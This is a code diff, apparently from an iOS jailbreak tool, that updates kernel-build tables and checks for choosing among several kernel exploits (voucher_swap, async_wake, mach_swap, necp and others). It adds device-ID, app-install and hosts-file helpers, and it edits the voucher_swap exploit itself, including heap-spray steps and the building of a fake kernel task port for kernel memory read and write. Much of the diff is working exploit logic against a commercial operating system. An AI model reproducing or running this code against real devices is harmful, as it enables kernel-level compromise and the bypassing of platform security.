@"4570.50.257~6",
|
||||
@"4570.50.279~9",
|
||||
@"4570.50.294~5",
|
||||
@"4570.52.2~3",
|
||||
@"4570.52.2~8",],
|
||||
|
||||
// Async Wake
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4"],
|
||||
|
||||
// Voucher Swap
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4",
|
||||
@"4570.30.79~22",
|
||||
@"4570.30.85~18",
|
||||
@"4570.32.1~2",
|
||||
@"4570.32.1~1",
|
||||
@"4570.40.6~8",
|
||||
@"4570.40.9~7",
|
||||
@"4570.40.9~1",
|
||||
@"4570.50.243~9",
|
||||
@"4570.50.257~6",
|
||||
@"4570.50.279~9",
|
||||
@"4570.50.294~5",
|
||||
@"4570.52.2~3",
|
||||
@"4570.52.2~8",
|
||||
@"4570.60.10.0.1~16",
|
||||
@"4570.60.16~9",
|
||||
@"4570.60.19~25",
|
||||
@"4570.60.21~7",
|
||||
@"4570.60.21~3",
|
||||
@"4570.70.14~16",
|
||||
@"4570.70.19~13",
|
||||
@"4570.70.24~9",
|
||||
@"4570.70.24~3",
|
||||
@"4903.200.199.12.3~1",
|
||||
@"4903.200.249.22.3~1",
|
||||
@"4903.200.274.32.3~1",
|
||||
@"4903.200.304.42.1~1",
|
||||
@"4903.200.327.52.1~1",
|
||||
@"4903.200.342.62.3~1",
|
||||
@"4903.200.354~11",
|
||||
@"4903.202.1~2",
|
||||
@"4903.202.2~2",
|
||||
@"4903.202.2~1",
|
||||
@"4903.220.42~21",
|
||||
@"4903.220.48~40",
|
||||
@"4903.222.1~7",
|
||||
@"4903.222.4~3",
|
||||
@"4903.222.5~3",
|
||||
@"4903.222.5~1",
|
||||
@"4903.230.15~8",
|
||||
@"4903.232.1~3",
|
||||
@"4903.232.2~2",
|
||||
@"4903.232.2~1",
|
||||
@"4903.240.8~8",
|
||||
@"4903.232.2~1"],
|
||||
|
||||
// Mach Swap
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4",
|
||||
@"4570.30.79~22",
|
||||
@"4570.30.85~18",
|
||||
@"4570.32.1~2",
|
||||
@"4570.32.1~1",
|
||||
@"4570.40.6~8",
|
||||
@"4570.40.9~7",
|
||||
@"4570.40.9~1",
|
||||
@"4570.50.243~9",
|
||||
@"4570.50.257~6",
|
||||
@"4570.50.279~9",
|
||||
@"4570.50.294~5",
|
||||
@"4570.52.2~3",
|
||||
@"4570.52.2~8",
|
||||
@"4570.60.10.0.1~16",
|
||||
@"4570.60.16~9",
|
||||
@"4570.60.19~25",
|
||||
@"4570.60.21~7",
|
||||
@"4570.60.21~3",
|
||||
@"4570.70.14~16",
|
||||
@"4570.70.19~13",
|
||||
@"4570.70.24~9",
|
||||
@"4570.70.24~3",
|
||||
@"4903.200.199.12.3~1",
|
||||
@"4903.200.249.22.3~1",
|
||||
@"4903.200.274.32.3~1",
|
||||
@"4903.200.304.42.1~1",
|
||||
@"4903.200.327.52.1~1",
|
||||
@"4903.200.342.62.3~1",
|
||||
@"4903.200.354~11",
|
||||
@"4903.202.1~2",
|
||||
@"4903.202.2~2",
|
||||
@"4903.202.2~1",
|
||||
@"4903.220.42~21",
|
||||
@"4903.220.48~40",
|
||||
@"4903.222.1~7",
|
||||
@"4903.222.4~3",
|
||||
@"4903.222.5~3",
|
||||
@"4903.222.5~1",
|
||||
@"4903.230.15~8",
|
||||
@"4903.232.1~3",
|
||||
@"4903.232.2~2",
|
||||
@"4903.232.2~1",
|
||||
@"4903.240.8~8",
|
||||
@"4903.232.2~1"],
|
||||
|
||||
// Deja Xnu
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4",
|
||||
@"4570.30.79~22",
|
||||
@"4570.30.85~18",
|
||||
@"4570.32.1~2",
|
||||
@"4570.32.1~1",
|
||||
@"4570.40.6~8",
|
||||
@"4570.40.9~7",
|
||||
@"4570.40.9~1",
|
||||
@"4570.50.243~9",
|
||||
@"4570.50.257~6",
|
||||
@"4570.50.279~9",
|
||||
@"4570.50.294~5",
|
||||
@"4570.52.2~3",
|
||||
@"4570.52.2~8",
|
||||
@"4570.60.10.0.1~16",
|
||||
@"4570.60.16~9",
|
||||
@"4570.60.19~25",
|
||||
@"4570.60.21~7",
|
||||
@"4570.60.21~3",
|
||||
@"4570.70.14~16",
|
||||
@"4570.70.19~13",
|
||||
@"4570.70.24~9",
|
||||
@"4570.70.24~3"],
|
||||
|
||||
// Necp
|
||||
@[@"4397.0.0.2.4~1",
|
||||
@"4481.0.0.2.1~1",
|
||||
@"4532.0.0.0.1~30",
|
||||
@"4556.0.0.2.5~1",
|
||||
@"4570.1.24.2.3~1",
|
||||
@"4570.2.3~8",
|
||||
@"4570.2.5~84",
|
||||
@"4570.2.5~167",
|
||||
@"4570.7.2~3",
|
||||
@"4570.20.55~10",
|
||||
@"4570.20.62~9",
|
||||
@"4570.20.62~4",
|
||||
@"4570.30.79~22",
|
||||
@"4570.30.85~18",
|
||||
@"4570.32.1~2",
|
||||
@"4570.32.1~1",
|
||||
@"4570.40.6~8",
|
||||
@"4570.40.9~7",
|
||||
@"4570.40.9~1",
|
||||
@"4570.50.243~9",
|
||||
@"4570.50.257~6",
|
||||
@"4570.50.279~9",
|
||||
@"4570.50.294~5",
|
||||
@"4570.52.2~3",
|
||||
@"4570.52.2~8",
|
||||
@"4570.60.10.0.1~16",
|
||||
@"4570.60.16~9",
|
||||
@"4570.60.19~25",
|
||||
@"4570.60.21~7",
|
||||
@"4570.60.21~3",
|
||||
@"4570.70.14~16",
|
||||
@"4570.70.19~13",
|
||||
@"4570.70.24~9",
|
||||
@"4570.70.24~3"],
|
||||
];
|
||||
});
|
||||
|
||||
NSString *minKernelBuildVersion = nil;
|
||||
NSString *maxKernelBuildVersion = nil;
|
||||
|
||||
switch (exploit) {
|
||||
case multi_path_exploit: {
|
||||
if (!multi_path_tcp_enabled()) {
|
||||
return false;
|
||||
}
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4570.52.2~8";
|
||||
break;
|
||||
}
|
||||
case voucher_swap_exploit: {
|
||||
if (vm_kernel_page_size != 0x4000) {
|
||||
if (get_kernel_page_size() != 0x4000) {
|
||||
return false;
|
||||
}
|
||||
if (machineNameContains("iPad5,") &&
|
||||
kCFCoreFoundationVersionNumber >= 1535.12) {
|
||||
return false;
|
||||
}
|
||||
if (machineNameContains("iPhone11,") ||
|
||||
machineNameContains("iPad8,")) {
|
||||
kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
|
||||
return false;
|
||||
}
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4903.240.8~8";
|
||||
break;
|
||||
}
|
||||
case mach_swap_exploit: {
|
||||
if (vm_kernel_page_size != 0x1000 &&
|
||||
if (get_kernel_page_size() != 0x1000 &&
|
||||
!machineNameContains("iPad5,") &&
|
||||
!machineNameContains("iPhone8,") &&
|
||||
!machineNameContains("iPad6,")) {
|
||||
return false;
|
||||
}
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4903.240.8~8";
|
||||
break;
|
||||
}
|
||||
case mach_swap_2_exploit: {
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4903.240.8~8";
|
||||
break;
|
||||
}
|
||||
case deja_xnu_exploit: {
|
||||
if (jailbreakEnabled())
|
||||
return false;
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4570.70.24~9";
|
||||
break;
|
||||
}
|
||||
case empty_list_exploit:
|
||||
case empty_list_exploit: {
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4570.60.19~25";
|
||||
break;
|
||||
case async_wake_exploit:
|
||||
}
|
||||
case async_wake_exploit: {
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4570.20.62~4";
|
||||
break;
|
||||
case necp_exploit:
|
||||
}
|
||||
case necp_exploit: {
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4570.70.24~9";
|
||||
break;
|
||||
}
|
||||
case kalloc_crash: {
|
||||
minKernelBuildVersion = @"4397.0.0.2.4~1";
|
||||
maxKernelBuildVersion = @"4903.252.2~2";
|
||||
break;
|
||||
}
|
||||
default:
|
||||
return false;
|
||||
break;
|
||||
}
|
||||
|
||||
for (NSString *string in list[exploit]) {
|
||||
if (kernelVersionContains(string.UTF8String)) {
|
||||
return true;
|
||||
if (minKernelBuildVersion != nil && maxKernelBuildVersion != nil) {
|
||||
NSString *kernelBuildVersion = getKernelBuildVersion();
|
||||
if (kernelBuildVersion != nil) {
|
||||
if ([kernelBuildVersion compare:minKernelBuildVersion options:NSNumericSearch] != NSOrderedAscending && [kernelBuildVersion compare:maxKernelBuildVersion options:NSNumericSearch] != NSOrderedDescending) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
@@ -1040,7 +822,8 @@ bool jailbreakSupported() {
|
||||
supportsExploit(multi_path_exploit) ||
|
||||
supportsExploit(async_wake_exploit) ||
|
||||
supportsExploit(voucher_swap_exploit) ||
|
||||
supportsExploit(mach_swap_exploit);
|
||||
supportsExploit(mach_swap_exploit) ||
|
||||
supportsExploit(mach_swap_2_exploit);
|
||||
}
|
||||
|
||||
bool respringSupported() {
|
||||
@@ -1049,7 +832,8 @@ bool respringSupported() {
|
||||
|
||||
bool restartSupported() {
|
||||
return supportsExploit(necp_exploit) ||
|
||||
supportsExploit(voucher_swap_exploit);
|
||||
supportsExploit(voucher_swap_exploit) ||
|
||||
supportsExploit(kalloc_crash);
|
||||
}
|
||||
|
||||
NSInteger recommendedJailbreakSupport() {
|
||||
@@ -1059,6 +843,8 @@ NSInteger recommendedJailbreakSupport() {
|
||||
return async_wake_exploit;
|
||||
else if (supportsExploit(voucher_swap_exploit))
|
||||
return voucher_swap_exploit;
|
||||
else if (supportsExploit(mach_swap_2_exploit))
|
||||
return mach_swap_2_exploit;
|
||||
else if (supportsExploit(multi_path_exploit))
|
||||
return multi_path_exploit;
|
||||
else if (supportsExploit(empty_list_exploit))
|
||||
@@ -1072,6 +858,8 @@ NSInteger recommendedRestartSupport() {
|
||||
return necp_exploit;
|
||||
else if (supportsExploit(voucher_swap_exploit))
|
||||
return voucher_swap_exploit;
|
||||
else if (supportsExploit(kalloc_crash))
|
||||
return kalloc_crash;
|
||||
else
|
||||
return -1;
|
||||
}
|
||||
@@ -1265,3 +1053,235 @@ bool airplaneModeEnabled() {
|
||||
}
|
||||
}
|
||||
|
||||
bool installApp(const char *bundle) {
|
||||
NSString *bundle_path = @(bundle);
|
||||
NSURL *URL = [NSURL URLWithString:bundle_path];
|
||||
NSString *info_plist_path = [bundle_path stringByAppendingPathComponent:@"Info.plist"];
|
||||
NSMutableDictionary *info_plist = [NSMutableDictionary dictionaryWithContentsOfFile:info_plist_path];
|
||||
NSString *bundle_identifier = info_plist[@"CFBundleIdentifier"];
|
||||
NSMutableDictionary *options = [NSMutableDictionary new];
|
||||
options[@"CFBundleIdentifier"] = bundle_identifier;
|
||||
LSApplicationWorkspace *applicationWorkspace = [LSApplicationWorkspace defaultWorkspace];
|
||||
if ([applicationWorkspace installApplication:URL withOptions:options]) {
|
||||
return true;
|
||||
} else {
|
||||
LOG("Failed to install application");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
bool rebuildApplicationDatabases() {
|
||||
LSApplicationWorkspace *applicationWorkspace = [LSApplicationWorkspace defaultWorkspace];
|
||||
if ([applicationWorkspace _LSPrivateRebuildApplicationDatabasesForSystemApps:YES internal:YES user:NO]) {
|
||||
return true;
|
||||
} else {
|
||||
LOG("Failed to rebuild application databases");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
char *get_path_for_pid(pid_t pid) {
|
||||
char *ret = NULL;
|
||||
uint32_t path_size = PROC_PIDPATHINFO_MAXSIZE;
|
||||
char *path = malloc(path_size);
|
||||
if (path != NULL) {
|
||||
if (proc_pidpath(pid, path, path_size) >= 0) {
|
||||
ret = strdup(path);
|
||||
}
|
||||
SafeFreeNULL(path);
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
|
||||
NSString *getECID() {
|
||||
NSString *ECID = nil;
|
||||
CFStringRef value = MGCopyAnswer(kMGUniqueChipID);
|
||||
if (value != nil) {
|
||||
ECID = [NSString stringWithFormat:@"%@", value];
|
||||
CFRelease(value);
|
||||
}
|
||||
return ECID;
|
||||
}
|
||||
|
||||
NSString *getUDID() {
|
||||
NSString *UDID = nil;
|
||||
CFStringRef value = MGCopyAnswer(kMGUniqueDeviceID);
|
||||
if (value != nil) {
|
||||
UDID = [NSString stringWithFormat:@"%@", value];
|
||||
CFRelease(value);
|
||||
}
|
||||
return UDID;
|
||||
}
|
||||
|
||||
char *sysctlWithName(const char *name) {
|
||||
kern_return_t kr = KERN_FAILURE;
|
||||
char *ret = NULL;
|
||||
size_t *size = NULL;
|
||||
size = (size_t *)malloc(sizeof(size_t));
|
||||
if (size == NULL) goto out;
|
||||
bzero(size, sizeof(size_t));
|
||||
if (sysctlbyname(name, NULL, size, NULL, 0) != ERR_SUCCESS) goto out;
|
||||
ret = (char *)malloc(*size);
|
||||
if (ret == NULL) goto out;
|
||||
bzero(ret, *size);
|
||||
if (sysctlbyname(name, ret, size, NULL, 0) != ERR_SUCCESS) goto out;
|
||||
kr = KERN_SUCCESS;
|
||||
out:
|
||||
if (kr == KERN_FAILURE) SafeFreeNULL(ret);
|
||||
SafeFreeNULL(size);
|
||||
return ret;
|
||||
}
|
||||
|
||||
char *getOSVersion() {
|
||||
return sysctlWithName("kern.osversion");
|
||||
}
|
||||
|
||||
char *getOSProductVersion() {
|
||||
return sysctlWithName("kern.osproductversion");
|
||||
}
|
||||
|
||||
void printOSDetails() {
|
||||
char *machineName = NULL;
|
||||
char *modelName = NULL;
|
||||
char *kernelVersion = NULL;
|
||||
char *OSProductVersion = NULL;
|
||||
char *OSVersion = NULL;
|
||||
machineName = getMachineName();
|
||||
if (machineName == NULL) goto out;
|
||||
modelName = getModelName();
|
||||
if (modelName == NULL) goto out;
|
||||
kernelVersion = getKernelVersion();
|
||||
if (kernelVersion == NULL) goto out;
|
||||
OSProductVersion = getOSProductVersion();
|
||||
if (OSProductVersion == NULL) goto out;
|
||||
OSVersion = getOSVersion();
|
||||
if (OSVersion == NULL) goto out;
|
||||
LOG("Machine Name: %s", machineName);
|
||||
LOG("Model Name: %s", modelName);
|
||||
LOG("Kernel Version: %s", kernelVersion);
|
||||
LOG("Kernel Page Size: 0x%lx", get_kernel_page_size());
|
||||
LOG("System Version: iOS %s (%s) (Build: %s)", OSProductVersion, isBetaFirmware() ? "Beta" : "Stable", OSVersion);
|
||||
out:
|
||||
SafeFreeNULL(machineName);
|
||||
SafeFreeNULL(modelName);
|
||||
SafeFreeNULL(kernelVersion);
|
||||
SafeFreeNULL(OSProductVersion);
|
||||
SafeFreeNULL(OSVersion);
|
||||
}
|
||||
|
||||
bool isBetaFirmware() {
|
||||
bool ret = false;
|
||||
char *OSVersion = getOSVersion();
|
||||
if (OSVersion == NULL) return false;
|
||||
if (strlen(OSVersion) > 6) ret = true;
|
||||
SafeFreeNULL(OSVersion);
|
||||
return ret;
|
||||
}
|
||||
|
||||
double getUptime() {
|
||||
double uptime = 0;
|
||||
size_t *size = NULL;
|
||||
struct timeval *boottime = NULL;
|
||||
size = (size_t *)malloc(sizeof(size_t));
|
||||
if (size == NULL) goto out;
|
||||
bzero(size, sizeof(size_t));
|
||||
*size = sizeof(struct timeval);
|
||||
boottime = (struct timeval *)malloc(*size);
|
||||
if (boottime == NULL) goto out;
|
||||
bzero(boottime, *size);
|
||||
int mib[2] = { CTL_KERN, KERN_BOOTTIME };
|
||||
if (sysctl(mib, 2, boottime, size, NULL, 0) != ERR_SUCCESS) goto out;
|
||||
time_t bsec = boottime->tv_sec, csec = time(NULL);
|
||||
uptime = difftime(csec, bsec);
|
||||
out:
|
||||
SafeFreeNULL(size);
|
||||
SafeFreeNULL(boottime);
|
||||
return uptime;
|
||||
}
|
||||
|
||||
vm_size_t get_kernel_page_size() {
|
||||
vm_size_t kernel_page_size = 0;
|
||||
vm_size_t *out_page_size = NULL;
|
||||
host_t host = mach_host_self();
|
||||
if (!MACH_PORT_VALID(host)) goto out;
|
||||
out_page_size = (vm_size_t *)malloc(sizeof(vm_size_t));
|
||||
if (out_page_size == NULL) goto out;
|
||||
bzero(out_page_size, sizeof(vm_size_t));
|
||||
if (_host_page_size(host, out_page_size) != KERN_SUCCESS) goto out;
|
||||
kernel_page_size = *out_page_size;
|
||||
out:
|
||||
if (MACH_PORT_VALID(host)) mach_port_deallocate(mach_task_self(), host); host = HOST_NULL;
|
||||
SafeFreeNULL(out_page_size);
|
||||
return kernel_page_size;
|
||||
}
|
||||
|
||||
int waitForFile(const char *filename) {
|
||||
auto rv = access(filename, F_OK);
|
||||
for (auto i = 0; !(i >= 100 || rv == ERR_SUCCESS); i++) {
|
||||
usleep(100000);
|
||||
rv = access(filename, F_OK);
|
||||
}
|
||||
return rv;
|
||||
}
|
||||
|
||||
NSString *hexFromInt(NSInteger val) {
|
||||
return [NSString stringWithFormat:@"0x%lX", (long)val];
|
||||
}
|
||||
|
||||
void waitFor(int seconds) {
|
||||
for (auto i = 1; i <= seconds; i++) {
|
||||
LOG("Waiting (%d/%d)", i, seconds);
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
|
||||
void blockDomainWithName(const char *name) {
|
||||
id hostsFile = nil;
|
||||
id newLine = nil;
|
||||
id newHostsFile = nil;
|
||||
hostsFile = [NSString stringWithContentsOfFile:@"/etc/hosts" encoding:NSUTF8StringEncoding error:nil];
|
||||
newHostsFile = hostsFile;
|
||||
newLine = [NSString stringWithFormat:@"\n127.0.0.1 %s\n", name];
|
||||
if (![hostsFile containsString:newLine]) {
|
||||
newHostsFile = [newHostsFile stringByAppendingString:newLine];
|
||||
}
|
||||
newLine = [NSString stringWithFormat:@"\n::1 %s\n", name];
|
||||
if (![hostsFile containsString:newLine]) {
|
||||
newHostsFile = [newHostsFile stringByAppendingString:newLine];
|
||||
}
|
||||
if (![newHostsFile isEqual:hostsFile]) {
|
||||
[newHostsFile writeToFile:@"/etc/hosts" atomically:YES encoding:NSUTF8StringEncoding error:nil];
|
||||
}
|
||||
}
|
||||
|
||||
void unblockDomainWithName(const char *name) {
|
||||
id hostsFile = nil;
|
||||
id newLine = nil;
|
||||
id newHostsFile = nil;
|
||||
hostsFile = [NSString stringWithContentsOfFile:@"/etc/hosts" encoding:NSUTF8StringEncoding error:nil];
|
||||
newHostsFile = hostsFile;
|
||||
newLine = [NSString stringWithFormat:@"\n127.0.0.1 %s\n", name];
|
||||
if ([hostsFile containsString:newLine]) {
|
||||
newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
|
||||
}
|
||||
newLine = [NSString stringWithFormat:@"\n0.0.0.0 %s\n", name];
|
||||
if ([hostsFile containsString:newLine]) {
|
||||
newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
|
||||
}
|
||||
newLine = [NSString stringWithFormat:@"\n0.0.0.0 %s\n", name];
|
||||
if ([hostsFile containsString:newLine]) {
|
||||
newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
|
||||
}
|
||||
newLine = [NSString stringWithFormat:@"\n::1 %s\n", name];
|
||||
if ([hostsFile containsString:newLine]) {
|
||||
newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
|
||||
}
|
||||
if (![newHostsFile isEqual:hostsFile]) {
|
||||
[newHostsFile writeToFile:@"/etc/hosts" atomically:YES encoding:NSUTF8StringEncoding error:nil];
|
||||
}
|
||||
}
|
||||
|
||||
__attribute__((constructor))
|
||||
static void ctor() {
|
||||
toInjectToTrustCache = [NSMutableArray new];
|
||||
}
|
||||
|
||||
@@ -18,6 +18,7 @@
|
||||
#include "mach_vm.h"
|
||||
#include "parameters.h"
|
||||
#include "platform.h"
|
||||
#include "common.h"
|
||||
|
||||
|
||||
// ---- Global parameters -------------------------------------------------------------------------
|
||||
@@ -194,7 +195,7 @@ voucher_spray_free(mach_port_t *voucher_ports, size_t count) {
|
||||
mach_port_deallocate(mach_task_self(), voucher_ports[i]);
|
||||
}
|
||||
}
|
||||
free(voucher_ports);
|
||||
SafeFreeNULL(voucher_ports);
|
||||
}
|
||||
|
||||
// ---- Helpers -----------------------------------------------------------------------------------
|
||||
@@ -665,7 +666,7 @@ stage3_init(uint64_t ipc_space_kernel, uint64_t kernel_map) {
|
||||
fake_port = MACH_PORT_NULL;
|
||||
success = true;
|
||||
fail_1:
|
||||
free(data);
|
||||
SafeFreeNULL(data);
|
||||
fail_0:
|
||||
return success;
|
||||
}
|
||||
@@ -824,11 +825,11 @@ voucher_swap() {
|
||||
|
||||
// 6. Spray 15% of memory in kalloc.1024 that we can free later to
|
||||
// prompt gc. We'll reuse some of the early ports from the port spray above for this.
|
||||
const size_t gc_spray_size = (kCFCoreFoundationVersionNumber >= 1535.12 ? 0.15 : 0.10) * platform.memory_size;
|
||||
const size_t gc_spray_size = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 0.15 : 0.10) * platform.memory_size;
|
||||
printf("Spray size: %ld\n", gc_spray_size);
|
||||
mach_port_t *gc_ports = filler_ports;
|
||||
size_t gc_port_count = 500; // Use at most 500 ports for the spray.
|
||||
sprayed_size = kalloc_spray_size(gc_ports, &gc_port_count, (kCFCoreFoundationVersionNumber >= 1535.12 ? 768 : 300) + 1, 1024, gc_spray_size);;
|
||||
sprayed_size = kalloc_spray_size(gc_ports, &gc_port_count, (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 768 : 300) + 1, 1024, gc_spray_size);
|
||||
INFO("sprayed %zu bytes to %zu ports in kalloc.%u", sprayed_size, gc_port_count, 1024);
|
||||
|
||||
// 7. Stash a pointer to an ipc_voucher in the thread's ith_voucher field and then remove
|
||||
@@ -881,7 +882,7 @@ voucher_swap() {
|
||||
// kalloc.32768 zone. We need to do this slowly in order to force a zone garbage
|
||||
// collection. Spraying 17% of memory (450 MB on the iPhone XR) with OOL ports should be
|
||||
// plenty.
|
||||
const size_t ool_ports_spray_size = (kCFCoreFoundationVersionNumber >= 1535.12 ? 0.25 : 0.085) * platform.memory_size;
|
||||
const size_t ool_ports_spray_size = (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? 0.25 : 0.085) * platform.memory_size;
|
||||
mach_port_t *ool_holding_ports = gc_ports + gc_port_count;
|
||||
size_t ool_holding_port_count = 500; // Use at most 500 ports for the spray.
|
||||
sprayed_size = ool_ports_spray_size_with_gc(ool_holding_ports, &ool_holding_port_count,
|
||||
@@ -890,7 +891,7 @@ voucher_swap() {
|
||||
ool_ports_spray_size);
|
||||
INFO("sprayed %zu bytes of OOL ports to %zu ports in kalloc.%zu",
|
||||
sprayed_size, ool_holding_port_count, ool_port_spray_kalloc_zone);
|
||||
free(ool_ports);
|
||||
SafeFreeNULL(ool_ports);
|
||||
|
||||
// 12. Once we've reallocated the voucher with an OOL ports allocation, the iv_refs field
|
||||
// will overlap with the lower 32 bits of the pointer to base_port. If base_port's address
|
||||
@@ -1000,9 +1001,9 @@ voucher_swap() {
|
||||
// ports, and close the sprayed pipes.
|
||||
thread_terminate(thread);
|
||||
destroy_ports(filler_ports, filler_port_count);
|
||||
free(filler_ports);
|
||||
SafeFreeNULL(filler_ports);
|
||||
close_pipes(pipefds_array, pipe_count);
|
||||
free(pipefds_array);
|
||||
SafeFreeNULL(pipefds_array);
|
||||
|
||||
// 17. Use mach_port_request_notification() to put a pointer to an array containing
|
||||
// base_port in our port's ip_requests field.
|
||||
@@ -1118,6 +1119,8 @@ voucher_swap() {
|
||||
|
||||
// 26. Build a fake kernel task port that allows us to read and write kernel memory.
|
||||
stage2_init(ipc_space_kernel, kernel_map);
|
||||
extern void prepare_for_rw_with_fake_tfp0(mach_port_t fake_tfp0);
|
||||
prepare_for_rw_with_fake_tfp0(kernel_task_port);
|
||||
|
||||
// 27. Alright, now kernel_read() and kernel_write() should work, so let's build a safer
|
||||
// kernel_task port. This also cleans up fake_port so that we (hopefully) won't panic on
|
||||
@@ -1136,7 +1139,7 @@ voucher_swap() {
|
||||
|
||||
// 29. And finally, deallocate the remaining unneeded (but non-corrupted) resources.
|
||||
pipe_close(pipefds);
|
||||
free(pipe_buffer);
|
||||
SafeFreeNULL(pipe_buffer);
|
||||
mach_port_destroy(mach_task_self(), base_port);
|
||||
|
||||
// 30. Unsandbox
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Submodule
+1
Submodule kerneldec added at 723458e8c6
Submodule
+1
Submodule offset-cache added at e4bb1114e5
+1
-1
Submodule patchfinder64 updated: 14dd6e5374...bc3448f0cc
Reference in New Issue
Block a user